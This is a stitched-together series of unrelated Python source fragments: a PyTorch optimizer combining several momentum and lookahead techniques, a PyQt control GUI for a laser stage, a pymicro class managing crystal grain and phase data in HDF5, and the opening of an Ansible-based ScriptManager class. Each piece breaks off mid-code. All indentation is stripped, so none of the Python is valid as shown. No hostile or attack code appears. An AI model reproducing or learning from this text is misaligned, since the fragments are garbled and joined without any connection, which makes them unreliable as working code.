state['prev_lr_grad'] = temp.view(-1)
p.data.add_(-group['lr'] * momentum)
if wd != 0:
p.data.add_(-wd * group['lr'], p.data)
if lookahead_step:
p.data.mul_(alpha).add_(
1.0 - alpha, state['cached_params'])
state['cached_params'].copy_(p.data)
return loss
class HyperProp(Optimizer):
# LaProp + hypergradient descent on lr and nu (for QH momentum) + QH Momentum + Decaying Momentum (DEMON) + Lookahead + Iterate Averaging + Nostalgia (from NosAdam) + P from PAdam
# + gradient centralization + weight decay
def __init__(self, params, lr=1e-3,
betas=(0.999, 0.999),
nu=0.7,
eps=1e-8,
gamma=0.0001,
nostalgia=True,
use_demon=True,
hypergrad_lr=0.02,
HDM=True,
hypertune_nu=True,
p=0.25,
k=5,
alpha=0.8,
IA=True,
IA_cycle=1000,
epochs=100,
step_per_epoch=None,
weight_decay=0,
use_gc=True,
use_diffgrad=False):
# betas = (beta1 for first order moments, beta2 for second order moments)
# nu = for quasi hyperbolic momentum
# eps = small value for numerical stability (avoid divide by zero)
# k = lookahead cycle
# alpha = outer learning rate (lookahead)
# gamma = used for nostalgia
# nostalgia = bool to decide whether to use nostalgia (from Nostalgic Adam or NosAdam)
# use_demon = bool to decide whether to use DEMON (Decaying Momentum) or not
# hypergrad_lr = learning rate for updating hyperparameters (like lr) through hypergradient descent (probably need to increase around 0.02 if HDM is True). Set to 0.0 to disable hypergradient descent.
# HDM = bool to decide whether | |
0.4); }")
# / Summary
# Action Buttons
_AR_action_btns = QtWidgets.QWidget()
_AR_action_btns_layout = QtWidgets.QGridLayout()
# https://stackoverflow.com/a/33793752/3211506
_AR_action_btns_spacer = QtWidgets.QSpacerItem(0, 0, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self._AR_retToOri = QtWidgets.QCheckBox("Return to Origin")
self._AR_retToOri.setChecked(True)
self._AR_start = QtWidgets.QPushButton("START")
_AR_action_btns_layout.setColumnStretch(0, 0)
_AR_action_btns_layout.addItem(_AR_action_btns_spacer, 0, 0)
_AR_action_btns_layout.addWidget(self._AR_retToOri, 1, 0)
_AR_action_btns_layout.addWidget(self._AR_start, 2, 0)
_AR_action_btns.setLayout(_AR_action_btns_layout)
# / Action Buttons
# void QGridLayout::addWidget(QWidget *widget, int row, int column, Qt::Alignment alignment = Qt::Alignment())
# void QGridLayout::addWidget(QWidget *widget, int fromRow, int fromColumn, int rowSpan, int columnSpan, Qt::Alignment alignment = Qt::Alignment())
# Create Layout to add widgets
_AR_numrows = 5
_AR_numcols = 6
_array_raster_layout = QtWidgets.QGridLayout()
# Add widgets at position
_array_raster_layout.addWidget(_AR_initial_settings, 0, 0)
_array_raster_layout.addWidget(_right_dash, 0, 1)
_array_raster_layout.addWidget(_AR_X_interval_settings, 0, 2, 1, 2)
_array_raster_layout.addWidget(_right_arrow, 0, 4)
_array_raster_layout.addWidget(self._AR_X_final_settings, 0, 5)
_array_raster_layout.addWidget(_down_dash, 1, 0)
_array_raster_layout.addWidget(_AR_Y_interval_settings, 2, 0)
_array_raster_layout.addWidget(_down_arrow, 3, 0)
_array_raster_layout.addWidget(_AR_size, 1, 2, 2, 2)
_array_raster_layout.addWidget(_AR_summary, 4, 1, 1, 4)
_array_raster_layout.addWidget(self._AR_Y_final_settings, 4, 0)
_array_raster_layout.addWidget(self._AR_XY_final_settings, 4, 5)
_array_raster_layout.addWidget(_AR_action_btns, 2, 5)
# To ensure each row and column is the same width
# https://stackoverflow.com/a/40154349/3211506
for i in range(_AR_numrows):
_array_raster_layout.setRowStretch(i, 1)
for j in range(_AR_numcols):
_array_raster_layout.setColumnStretch(j, 1)
_array_raster_layout.setColumnStretch(1, 0.5)
_array_raster_layout.setColumnStretch(4, 0.5)
_array_raster_layout.setRowStretch(1, 0.5)
_array_raster_layout.setRowStretch(3, 0.5)
# Velocities, comma separated
# Size
# Power, comma separated
return _array_raster_layout
# fourth layout
@make_widget_from_layout
def create_drawpic(self, widget):
_drawpic_layout = QtWidgets.QGridLayout()
# INSTRUCTION
# _DP_instructions = QtWidgets.QGroupBox("Instructions")
# _DP_instructions_layout = QtWidgets.QVBoxLayout()
_DP_instructions_scrollArea = QtWidgets.QScrollArea() # QTextBrowser
_DP_instructions_label = QtWidgets.QLabel()
_DP_instructions_string = [
"<b style='color: #22F;'>Instructions</b>",
"'Draw Picture' takes in a 1-bit BMP image and prints it out using the stage.",
"Each option has some hints on mouseover.",
"Go through each step <span style='font-family: Menlo, Consolas, monospace;'>[i]</span> sequentially to print the image. Each pixel represents 1 {}m.".format(self.MICROSYMBOL),
"Scale:<br>If x-scale = 2, this means that for every 1-pixel move along the x-direction the code sees, it moves 2{0}m along the x-direction. Generally, scale = beamspot-size in {0}m if x-scale = y-scale. Test and iterate to ensure.".format(self.MICROSYMBOL),
"Print a non-symmetrical image (e.g. <a href='{}'>fliptest.bmp</a>) to test whether the horizontal and vertical needs to be flipped. <span style='color: red;'>NOTE:</span> Flipping flips the image first before parsing its lines! To flip after, use a negative number as the scale.".format(os.path.join(root_dir, '1_runs', 'fliptest', 'fliptest.bmp')),
"The code will greedily search for the next pixel to the right of the current pixel to determine continuous lines. To prioritize searching the left pixel first, check 'Search left before right'."
]
_DP_instructions_label.setText("<br/><br/>".join(_DP_instructions_string))
_DP_instructions_label.setWordWrap(True)
_DP_instructions_label.setTextFormat(QtCore.Qt.RichText)
_DP_instructions_label.setTextInteractionFlags(QtCore.Qt.TextBrowserInteraction)
_DP_instructions_label.setOpenExternalLinks(True)
_DP_instructions_scrollArea.setBackgroundRole(QtGui.QPalette.Light)
_DP_instructions_scrollArea.setWidget(_DP_instructions_label)
_DP_instructions_scrollArea.setWidgetResizable(True)
# https://www.oipapio.com/question-3065786
# _DP_instructions_layout.addWidget(_DP_instructions_scrollArea)
# _DP_instructions.setLayout(_DP_instructions_layout)
# / INSTRUCTIONS
# DRAW PIC INTERFACE
_DP_main = QtWidgets.QGroupBox("Parameters")
_DP_main_layout = QtWidgets.QGridLayout()
# _DP_picture_fn_label = QtWidgets.QLabel("BMP File")
# _DP_picture_fn_label.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self._DP_picture_fn = QtWidgets.QLineEdit()
self._DP_picture_fn.setPlaceholderText("File name")
self._DP_picture_btn = QtWidgets.QPushButton("Browse...")
self._DP_picture_load = QtWidgets.QPushButton("Load")
self._DP_picture_preview = QtWidgets.QLabel("<i>Preview Here</i>")
self._DP_picture_preview.setStyleSheet("color: #777;")
self._DP_picture_preview.setAlignment(QtCore.Qt.AlignCenter)
# Options
# def __init__(self, filename, xscale = 1, yscale = 1, cut = 0, allowDiagonals = False, prioritizeLeft = False, flipHorizontally = False, flipVertically = False ,frames = False, simulate = False, simulateDrawing = False, micronInstance = None, shutterTime = 800)
_DP_options = QtWidgets.QWidget() # QGroupBox("Options")
_DP_options_layout = QtWidgets.QGridLayout()
_DP_xscale_label = QtWidgets.QLabel("X-Scale")
_DP_xscale_label.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self._DP_xscale = QtWidgets.QLineEdit("1")
# self._DP_xscale.setValidator(QtGui.QDoubleValidator(0,10000, 12))
self._DP_xscale.setValidator(QtGui.QDoubleValidator())
self._DP_xscale.setToolTip("This is usually your beam spot size.")
_DP_yscale_label = QtWidgets.QLabel("Y-Scale")
_DP_yscale_label.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self._DP_yscale = QtWidgets.QLineEdit("1")
# self._DP_yscale.setValidator(QtGui.QDoubleValidator(0,10000, 12))
self._DP_yscale.setValidator(QtGui.QDoubleValidator())
self._DP_yscale.setToolTip("This is usually your beam spot size.")
_DP_cutMode_label = QtWidgets.QLabel("Cut")
_DP_cutMode_label.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self._DP_cutMode = QtWidgets.QComboBox()
self._DP_cutMode.addItem("Black")
self._DP_cutMode.addItem("White")
self._DP_allowDiagonals = QtWidgets.QCheckBox("Allow Diagonals")
self._DP_flipVertically = QtWidgets.QCheckBox("Flip Vertically")
self._DP_flipHorizontally = QtWidgets.QCheckBox("Flip Horizontally")
self._DP_allowDiagonals.setChecked(True)
self._DP_allowDiagonals.setToolTip("Diagonal pixels will also be considered adjacent\npixels when parsing the picture into lines.")
self._DP_flipVertically.setToolTip("Use a simple image to test whether flipping is necessary.\nImage is flipped BEFORE parsing it.")
self._DP_flipHorizontally.setToolTip("Use a simple image to test whether flipping is necessary.\nImage is flipped BEFORE parsing it.")
self._DP_prioritizeLeft = QtWidgets.QCheckBox("Search left before right")
self._DP_prioritizeLeft.setToolTip("Algorithm moves from right to left and searches for\na left pixel first before of the right pixel.")
_DP_options_layout.addWidget(_DP_xscale_label , 0, 0, 1, 1)
_DP_options_layout.addWidget(self._DP_xscale , 0, 1, 1, 1)
_DP_options_layout.addWidget(_DP_yscale_label , 1, 0, 1, 1)
_DP_options_layout.addWidget(self._DP_yscale , 1, 1, 1, 1)
_DP_options_layout.addWidget(_DP_cutMode_label , 2, 0, 1, 1)
_DP_options_layout.addWidget(self._DP_cutMode , 2, 1, 1, 1)
_DP_options_layout.addWidget(self._DP_allowDiagonals , 2, 2, 1, 1)
_DP_options_layout.addWidget(self._DP_flipVertically , 1, 2, 1, 1)
_DP_options_layout.addWidget(self._DP_flipHorizontally , 0, 2, 1, 1)
_DP_options_layout.addWidget(self._DP_prioritizeLeft , 3, 0, 1, 3)
_DP_options_layout.setColumnStretch(0, 1)
_DP_options_layout.setColumnStretch(1, 2)
_DP_options_layout.setColumnStretch(2, 1)
_DP_options.setLayout(_DP_options_layout)
# / Options
self._DP_picture_parse = QtWidgets.QPushButton("Parse Picture")
_DP_moveToZero = QtWidgets.QLabel('Move to (0, 0), usually top-left, of the image using "Stage Movement"')
_DP_moveToZero.setWordWrap(True)
_DP_velocity_label = QtWidgets.QLabel("Velocity ({}m/s)".format(self.MICROSYMBOL))
_DP_velocity_label.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self._DP_velocity = QtWidgets.QLineEdit("100")
self._DP_velocity.setValidator(QtGui.QDoubleValidator(0,10000, 12))
self._DP_picture_estimateTime = QtWidgets.QPushButton("Estimate Time")
self._DP_picture_draw = QtWidgets.QPushButton("Draw")
_DP_steps_labels = []
for i in range(6):
_temp_label = QtWidgets.QLabel("[{}]".format(i + 1))
_temp_label.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
_temp_label.setStyleSheet("font-family: Menlo, Consolas, monospace;")
_DP_steps_labels.append(_temp_label)
_DP_main_layout.addWidget(_DP_steps_labels[0], 0, 0, 1, 1)
# _DP_main_layout.addWidget(_DP_picture_fn_label, 1, 1, 1, 1)
_DP_main_layout.addWidget(self._DP_picture_fn, 0, 1, 1, 3)
_DP_main_layout.addWidget(self._DP_picture_btn, 0, 4, 1, 1)
_DP_main_layout.addWidget(_DP_steps_labels[1], 1, 0, 1, 1)
_DP_main_layout.addWidget(self._DP_picture_load, 1, 1, 1, 4)
_DP_main_layout.addWidget(_DP_steps_labels[2], 2, 0, 1, 1)
_DP_main_layout.addWidget(_DP_options, 2, 1, 1, 4)
_DP_main_layout.addWidget(_DP_steps_labels[3], 3, 0, 1, 1)
_DP_main_layout.addWidget(self._DP_picture_parse, 3, 1, 1, 4)
_DP_main_layout.addWidget(_DP_steps_labels[4], 4, 0, 1, 1)
_DP_main_layout.addWidget(_DP_moveToZero, 4, 1, 1, 4)
_DP_main_layout.addWidget(_DP_steps_labels[5], 5, 0, 1, 1)
_DP_main_layout.addWidget(_DP_velocity_label, 5, 1, 1, 1)
_DP_main_layout.addWidget(self._DP_velocity, 5, 2, 1, 3)
_DP_main_layout.addWidget(self._DP_picture_estimateTime, 6, 0, 1, 2)
_DP_main_layout.addWidget(self._DP_picture_draw, 6, 2, 1, 3)
_DP_main_layout.setColumnStretch(0, 1)
for i in range(1, 4):
_DP_main_layout.setColumnStretch(i, 2)
_DP_main.setLayout(_DP_main_layout)
# / DRAW PIC INTERFACE
# _drawpic_layout.addWidget(_DP_instructions, 0, 0)
_drawpic_layout.addWidget(self._DP_picture_preview, 0, 0, 1, 1)
_drawpic_layout.addWidget(_DP_instructions_scrollArea, 1, 0, 1, 1)
_drawpic_layout.addWidget(_DP_main, 0, 1, 2, 1)
_drawpic_layout.setColumnStretch(0, 1)
_drawpic_layout.setColumnStretch(1, 1)
_drawpic_layout.setRowStretch(0, 1)
_drawpic_layout.setRowStretch(1, 1)
return _drawpic_layout
# INTERACTION FUNCTONS
def initEventListeners(self):
# STAGE
self.UP, self.RIGHT, self.DOWN, self.LEFT = (0, 1), (1, 0), (0, -1), (-1, 0)
self.cardinalStageMoving = False
self.lastCardinalStageMove = datetime.datetime.now()
self._upArrow.clicked.connect(lambda: self.cardinalMoveStage(self.UP))
self._downArrow.clicked.connect(lambda: self.cardinalMoveStage(self.DOWN))
self._leftArrow.clicked.connect(lambda: self.cardinalMoveStage(self.LEFT))
self._rightArrow.clicked.connect(lambda: self.cardinalMoveStage(self.RIGHT))
self._homeBtn.clicked.connect(lambda: self.homeStage())
self._SL_invertx_checkbox.stateChanged.connect(lambda: self.invertCheck())
self._SL_inverty_checkbox.stateChanged.connect(lambda: self.invertCheck())
self._SL_velocity.textChanged.connect(lambda: self.recalculateKeystrokeTimeout())
self._SL_step_size.textChanged.connect(lambda: self.recalculateKeystrokeTimeout())
self.keyMapping = {
QtCore.Qt.Key_Up : "Up",
QtCore.Qt.Key_Down : "Down",
QtCore.Qt.Key_Left : "Left",
QtCore.Qt.Key_Right: "Right"
}
# self.keysPressed = {}
# Not implementing due to not being able to obtain keyPress events reliably
self.stage_widget.installEventFilter(self)
self.installEventFilter(self)
# note that the following you cannot connect(self.checkSRValues) because the value will be passed in as an argument to self.checkSRValues
# COMMON
self.operationDone.connect(self.on_operationDone)
self.EL_self_criticalDialog.connect(self.on_EL_self_criticalDialog)
# SINGLE RASTER
self._SR_velocity.textChanged.connect(lambda: self.checkSRValues())
self._SR_size_x.textChanged.connect(lambda: self.checkSRValues())
self._SR_size_y.textChanged.connect(lambda: self.checkSRValues())
self._SR_step_size.textChanged.connect(lambda: self.checkSRValues())
self._SR_raster_x.stateChanged.connect(lambda: self.checkSRValues())
self._SR_raster_y.stateChanged.connect(lambda: self.checkSRValues())
self._SR_retToOri.stateChanged.connect(lambda: self.checkSRValues())
self._SR_start.clicked.connect(lambda: self.checkSRValues(startRaster = True))
self._SR_pow_up.clicked.connect(lambda: self.adjustPower(direction = "+"))
self._SR_pow_dn.clicked.connect(lambda: self.adjustPower(direction = "-"))
self._SR_pow_step.textChanged.connect(lambda: self._SR_pow_step.setStyleSheet("background-color: none; color: #000;"))
# ARRAY RASTER
self._AR_init_velocity.textChanged.connect(lambda: self.recalculateARValues())
self._AR_init_power.textChanged.connect(lambda: self.recalculateARValues())
self._AR_X_mode.currentIndexChanged.connect(lambda: self.recalculateARValues())
self._AR_cols.textChanged.connect(lambda: self.recalculateARValues())
self._AR_X_intervals.textChanged.connect(lambda: self.recalculateARValues())
self._AR_X_spacing.textChanged.connect(lambda: self.recalculateARValues())
self._AR_Y_mode.currentIndexChanged.connect(lambda: self.recalculateARValues())
self._AR_rows.textChanged.connect(lambda: self.recalculateARValues())
self._AR_Y_intervals.textChanged.connect(lambda: self.recalculateARValues())
self._AR_Y_spacing.textChanged.connect(lambda: self.recalculateARValues())
self._AR_size_x.textChanged.connect(lambda: self.recalculateARValues())
self._AR_size_y.textChanged.connect(lambda: self.recalculateARValues())
self._AR_step_size.textChanged.connect(lambda: self.recalculateARValues())
self._AR_raster_x.stateChanged.connect(lambda: self.recalculateARValues())
self._AR_raster_y.stateChanged.connect(lambda: self.recalculateARValues())
self._AR_retToOri.stateChanged.connect(lambda: self.recalculateARValues())
self._AR_start.clicked.connect(lambda: self.recalculateARValues(startRaster = True))
# DRAW PIC
self._DP_picture_btn.clicked.connect(lambda: self._DP_getFile())
self._DP_picture_load.clicked.connect(lambda: self._DP_loadPicture())
self._DP_picture_parse.clicked.connect(lambda: self._DP_parsePicture())
self._DP_picture_estimateTime.clicked.connect(lambda: self._DP_drawPicture(estimateOnly = True))
self._DP_picture_draw.clicked.connect(lambda: self._DP_drawPicture())
self._DP_xscale.textChanged.connect(lambda: self._DP_optionsChanged())
self._DP_yscale.textChanged.connect(lambda: self._DP_optionsChanged())
self._DP_cutMode.currentIndexChanged.connect(lambda: self._DP_optionsChanged())
self._DP_allowDiagonals.stateChanged.connect(lambda: self._DP_optionsChanged())
self._DP_flipVertically.stateChanged.connect(lambda: self._DP_optionsChanged())
self._DP_flipHorizontally.stateChanged.connect(lambda: self._DP_optionsChanged())
self._DP_prioritizeLeft.stateChanged.connect(lambda: self._DP_optionsChanged())
self._DP_picture_fn.textChanged.connect(lambda: self._DP_filenameLineEditChanged())
self.picConvWarn.connect(self.on_picConvWarn)
# SHUTTER
self._close_shutter.clicked.connect(lambda: self.stageControl.controller.shutter.close())
self._open_shutter.clicked.connect(lambda: self.stageControl.controller.shutter.open())
self._abortBtn.clicked.connect(lambda: threading.Thread(target = self.KeyboardInterruptHandler, kwargs = dict(abortTrigger = True)).start())
# keyPressEvent(self, evt)
def eventFilter(self, source, evt):
# https://www.riverbankcomputing.com/static/Docs/PyQt4/qt.html#Key-enum
# print(evt)
if isinstance(evt, QtGui.QKeyEvent): #.type() ==
# Check source here
evtkey = evt.key()
# if (evt.type() == QtCore.QEvent.KeyPress):
# print("KeyPress : {}".format(key))
# if key not in self.keysPressed:
# self.keysPressed[key] = 1
# if key in self.keysPressed:
# del self.keysPressed[key]
# print("\033[K", str(self.keysPressed), end="\r")
if (evt.type() == QtCore.QEvent.KeyRelease):
# print("KeyRelease : {}".format(evtkey))
# All KeyRelease events go here
if evtkey == QtCore.Qt.Key_C and (evt.modifiers() & QtCore.Qt.ControlModifier):
# Will work everywhere
self.KeyboardInterruptHandler()
return True # Prevents further handling
if evtkey == QtCore.Qt.Key_Space:
self.stageControl.controller.shutter.close() if self.stageControl.controller.shutter.isOpen else self.stageControl.controller.shutter.open()
return True # Prevents further handling
# self.logconsole(self.lastCardinalStageMove)
# now = datetime.datetime.now()
# try:
# if now >= self.lastEvent + datetime.timedelta(seconds = 1):
# print(self.numEvents)
# self.numSeconds += 1
# self.lastEvent = now
# self.numEvents = 0
# except Exception as e:
# self.lastEvent = now
# self.numSeconds = 0
# self.numEvents = 0
#
# self.numEvents += 1
# ==> we deduce about 66 events / second
# we try to block it as early and possible
# WARNING: This still doesn't work as expected like in the previous VBA iteration of this
if source == self.stage_widget | |
not present at the end of name
filename = name + (not name.endswith('_')) * '_' + 'data'
# prepare arguments for after file open
after_file_open_args = {'phase':phase}
# call SampleData constructor
SampleData.__init__(self, filename=filename, sample_name=name,
sample_description=description, verbose=verbose,
overwrite_hdf5=overwrite_hdf5,
autodelete=autodelete,
after_file_open_args=after_file_open_args)
return
def _after_file_open(self, phase=None, **kwargs):
"""Initialization code to run after opening a Sample Data file."""
self.grains = self.get_node('GrainDataTable')
if self._file_exist:
self.active_grain_map = self.get_attribute('active_grain_map',
'CellData')
if self.active_grain_map is None:
self.set_active_grain_map()
self._init_phase(phase)
if not hasattr(self, 'active_phase_id'):
self.active_phase_id = 1
else:
self.set_active_grain_map()
self._init_phase(phase)
self.active_phase_id = 1
return
def __repr__(self):
"""Provide a string representation of the class."""
s = '%s\n' % self.__class__.__name__
s += '* name: %s\n' % self.get_sample_name()
# TODO print phases here
s += '* lattice: %s\n' % self.get_lattice()
s += '\n'
# if self._verbose:
# for g in self.grains:
# s += '* %s' % g.__repr__
s += SampleData.__repr__(self)
return s
def minimal_data_model(self):
"""Data model for a polycrystalline microstructure.
Specify the minimal contents of the hdf5 (Group names, paths and group
types) in the form of a dictionary {content: location}. This extends
`~pymicro.core.SampleData.minimal_data_model` method.
:return: a tuple containing the two dictionnaries.
"""
minimal_content_index_dic = {'Image_data': '/CellData',
'grain_map': '/CellData/grain_map',
'phase_map': '/CellData/phase_map',
'mask': '/CellData/mask',
'Mesh_data': '/MeshData',
'Grain_data': '/GrainData',
'GrainDataTable': ('/GrainData/'
'GrainDataTable'),
'Phase_data': '/PhaseData'}
minimal_content_type_dic = {'Image_data': '3DImage',
'grain_map': 'field_array',
'phase_map': 'field_array',
'mask': 'field_array',
'Mesh_data': 'Mesh',
'Grain_data': 'Group',
'GrainDataTable': GrainData,
'Phase_data': 'Group'}
return minimal_content_index_dic, minimal_content_type_dic
def _init_phase(self, phase):
self._phases = []
if phase is None:
# create a default crystalline phase
phase = CrystallinePhase()
# if the h5 file does not exist yet, store the phase as metadata
if not self._file_exist: #FIXME is this useful?
self.add_phase(phase)
else:
self.sync_phases()
# if no phase is there, create one
if len(self.get_phase_ids_list()) == 0:
print('no phase was found in this dataset, adding a defualt one')
self.add_phase(phase)
return
def sync_phases(self):
"""This method sync the _phases attribute with the content of the hdf5
file.
"""
self._phases = []
# loop on the phases present in the group /PhaseData
phase_group = self.get_node('/PhaseData')
for child in phase_group._v_children:
d = self.get_dic_from_attributes('/PhaseData/%s' % child)
#print(d)
phase = CrystallinePhase.from_dict(d)
self._phases.append(phase)
#print('%d phases found in the data set' % len(self._phases))
def set_phase(self, phase):
"""Set a phase for the given `phase_id`.
If the phase id does not correspond to one of the existing phase,
nothing is done.
:param CrystallinePhase phase: the phase to use.
:param int phase_id:
"""
if phase.phase_id > self.get_number_of_phases():
print('the phase_id given (%d) does not correspond to any existing '
'phase, the phase list has not been modified.')
return
d = phase.to_dict()
print('setting phase %d with %s' % (phase.phase_id, phase.name))
self.add_attributes(d, '/PhaseData/phase_%02d' % phase.phase_id)
self.sync_phases()
def set_phases(self, phase_list):
"""Set a list of phases for this microstructure.
The different phases in the list are added in that order.
:param list phase_list: the list of phases to use.
"""
# delete all node in the phase_group
self.remove_node('/PhaseData', recursive=True)
self.add_group('PhaseData', location='/', indexname='Phase_data')
self.sync_phases()
# add each phase
for phase in phase_list:
self.add_phase(phase)
def get_number_of_phases(self):
"""Return the number of phases in this microstructure.
Each crystal phase is stored in a list attribute: `_phases`. Note that
it may be different (although it should not) from the different
phase ids in the phase_map array.
:return int: the number of phases in the microstructure.
"""
return len(self._phases)
def get_number_of_grains(self, from_grain_map=False):
"""Return the number of grains in this microstructure.
:return: the number of grains in the microstructure.
"""
if from_grain_map:
return len(np.unique(self.get_grain_map()))
else:
return self.grains.nrows
def add_phase(self, phase):
"""Add a new phase to this microstructure.
Before adding this phase, the phase id is set to the corresponding id.
:param CrystallinePhase phase: the phase to add.
"""
# this phase should have id self.get_number_of_phases() + 1
new_phase_id = self.get_number_of_phases() + 1
if not phase.phase_id == new_phase_id:
print('warning, adding phase with phase_id = %d (was %d)' %
(new_phase_id, phase.phase_id))
phase.phase_id = new_phase_id
self._phases.append(phase)
self.add_group('phase_%02d' % new_phase_id, location='/PhaseData',
indexname='phase_%02d' % new_phase_id, replace=True)
d = phase.to_dict()
self.add_attributes(d, '/PhaseData/phase_%02d' % new_phase_id)
print('new phase added: %s' % phase.name)
def get_phase_ids_list(self):
"""Return the list of the phase ids."""
return [phase.phase_id for phase in self._phases]
def get_phase(self, phase_id=None):
"""Get a crystalline phase.
If no phase_id is given, the active phase is returned.
:param int phase_id: the id of the phase to return.
:return: the `CrystallinePhase` corresponding to the id.
"""
if phase_id is None:
phase_id = self.active_phase_id
index = self.get_phase_ids_list().index(phase_id)
return self._phases[index]
def get_lattice(self, phase_id=None):
"""Get the crystallographic lattice associated with this microstructure.
If no phase_id is given, the `Lattice` of the active phase is returned.
:return: an instance of the `Lattice class`.
"""
return self.get_phase(phase_id).get_lattice()
def get_grain_map(self, as_numpy=True):
grain_map = self.get_field(self.active_grain_map)
if self._is_empty(self.active_grain_map):
grain_map = None
elif grain_map.ndim == 2:
# reshape to 3D
new_dim = self.get_attribute('dimension', 'CellData')
if len(new_dim) == 3:
grain_map = grain_map.reshape((new_dim))
else:
grain_map = grain_map.reshape((grain_map.shape[0],
grain_map.shape[1],
1))
return grain_map
def get_phase_map(self, as_numpy=True):
phase_map = self.get_field('phase_map')
if self._is_empty('phase_map'):
phase_map = None
elif phase_map.ndim == 2:
# reshape to 3D
new_dim = self.get_attribute('dimension', 'CellData')
if len(new_dim) == 3:
phase_map = phase_map.reshape((new_dim))
else:
phase_map = phase_map.reshape((phase_map.shape[0],
phase_map.shape[1],
1))
return phase_map
def get_mask(self, as_numpy=False):
mask = self.get_field('mask')
if self._is_empty('mask'):
mask = None
elif mask.ndim == 2:
# reshape to 3D
new_dim = self.get_attribute('dimension', 'CellData')
if len(new_dim) == 3:
mask = mask.reshape((new_dim))
else:
mask = mask.reshape((mask.shape[0],
mask.shape[1],
1))
return mask
def get_ids_from_grain_map(self):
"""Return the list of grain ids found in the grain map.
By convention, only positive values are taken into account, 0 is
reserved for the background and -1 for overlap regions.
:return: a 1D numpy array containing the grain ids.
"""
grain_map = self.get_node('grain_map')
grains_id = np.unique(grain_map)
grains_id = grains_id[grains_id > 0]
return grains_id
def get_grain_ids(self):
"""Return the grain ids found in the GrainDataTable.
:return: a 1D numpy array containing the grain ids.
"""
return self.get_tablecol('GrainDataTable', 'idnumber')
@staticmethod
def id_list_to_condition(id_list):
"""Convert a list of id to a condition to filter the grain table.
The condition will be interpreted using Numexpr typically using
a `read_where` call on the grain data table.
:param list id_list: a non empty list of the grain ids.
:return: the condition as a string .
"""
if not len(id_list) > 0:
raise ValueError('the list of grain ids must not be empty')
condition = "\'(idnumber == %d)" % id_list[0]
for grain_id in id_list[1:]:
condition += " | (idnumber == %d)" % grain_id
condition += "\'"
return condition
def get_grain_volumes(self, id_list=None):
"""Get the grain volumes.
The grain data table is queried and the volumes of the grains are
returned in a single array. An optional list of grain ids can be used
to restrict the grains, by default all the grain volumes are returned.
:param list id_list: a non empty list of the grain ids.
:return: a numpy array containing the grain volumes.
"""
if id_list:
condition = Microstructure.id_list_to_condition(id_list)
return self.grains.read_where(eval(condition))['volume']
else:
return self.get_tablecol('GrainDataTable', 'volume')
def get_grain_centers(self, id_list=None):
"""Get the grain centers.
The grain data table is queried and the centers of the grains are
returned in a single array. An optional list of grain ids can be used
to restrict the grains, by default all the grain centers are returned.
:param list id_list: a non empty list of the grain ids.
:return: a numpy array containing the grain centers.
"""
if id_list:
condition = Microstructure.id_list_to_condition(id_list)
return self.grains.read_where(eval(condition))['center']
else:
return self.get_tablecol('GrainDataTable', 'center')
def get_grain_rodrigues(self, id_list=None):
"""Get the grain rodrigues vectors.
The grain data table is queried and the rodrigues vectors of the grains
are returned in a single array. An optional list of grain ids can be
used to restrict the grains, by default all the grain rodrigues vectors
are returned.
:param list id_list: a non empty list of the grain ids.
:return: a numpy array containing the grain rodrigues vectors.
"""
if id_list:
condition = Microstructure.id_list_to_condition(id_list)
return self.grains.read_where(eval(condition))['orientation']
else:
return self.get_tablecol('GrainDataTable', 'orientation')
def get_grain_orientations(self, id_list=None):
"""Get a list of the grain orientations.
The grain data table is queried to retreiv the rodrigues vectors.
An optional list of | |
# -*- coding:utf-8 -*-
"""
Copyright 2021 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import time
import hashlib
import datetime
import subprocess
from api.discovery import SSH
from api.setting import Setting, decrypt_password
from api import script
from api import reporter
from api import node
class ScriptManager:
def __init__(self, ESConnector):
self.ES = ESConnector
self.settings = Setting(self.ES)
self._ansible_inventory_file = None
self._ansible_playbook_file = None
self._ansible_session_id = None
self._ansible_session_dir = None
self._node_id = None
self._realm_settings = None
self._scenario_id = None
self._script_id = None
self._script_args = None
self._script_name = None
self._script_description = None
self._script_locker = None
self._script_realm = None
self._script_destination = None
self._script_filename = None
self._script_output = None
self._script_report_id = None
self._script_report = None
self._script_type = None
self._script_content = None
self._execution_id = None
@property
def ansible_inventory_file(self):
return self._ansible_inventory_file
@ansible_inventory_file.setter
def ansible_inventory_file(self, ansible_inventory_file):
self._ansible_inventory_file = ansible_inventory_file
@property
def ansible_playbook_file(self):
return self._ansible_playbook_file
@ansible_playbook_file.setter
def ansible_playbook_file(self, ansible_playbook_file):
self._ansible_playbook_file = ansible_playbook_file
@property
def ansible_session_id(self):
return self._ansible_session_id
@ansible_session_id.setter
def ansible_session_id(self, ansible_session_id):
self._ansible_session_id = ansible_session_id
@property
def ansible_session_dir(self):
return self._ansible_session_dir
@ansible_session_dir.setter
def ansible_session_dir(self, ansible_session_dir):
self._ansible_session_dir = ansible_session_dir
@property
def node_id(self):
return self._node_id
@node_id.setter
def node_id(self, node_id: str):
self._node_id = node_id
@property
def realm_settings(self):
return self._realm_settings
@realm_settings.setter
def realm_settings(self, realm_settings):
self._realm_settings = realm_settings
@property
def scenario_id(self):
return self._scenario_id
@scenario_id.setter
def scenario_id(self, scenario_id: str):
self._scenario_id = scenario_id
@property
def script_id(self):
return self._script_id
@script_id.setter
def script_id(self, script_id: str):
self._script_id = script_id
@property
def script_args(self):
return self._script_args
@script_args.setter
def script_args(self, script_args: str):
self._script_args = script_args
@property
def script_name(self):
return self._script_name
@script_name.setter
def script_name(self, script_name: str):
self._script_name = script_name
@property
def script_description(self):
return self._script_description
@script_description.setter
def script_description(self, script_description: str):
self._script_description = script_description
@property
def script_output(self):
return self._script_output
@script_output.setter
def script_output(self, script_output: str):
self._script_output = script_output
@property
def script_report(self):
return self._script_report
@script_report.setter
def script_report(self, script_report: dict):
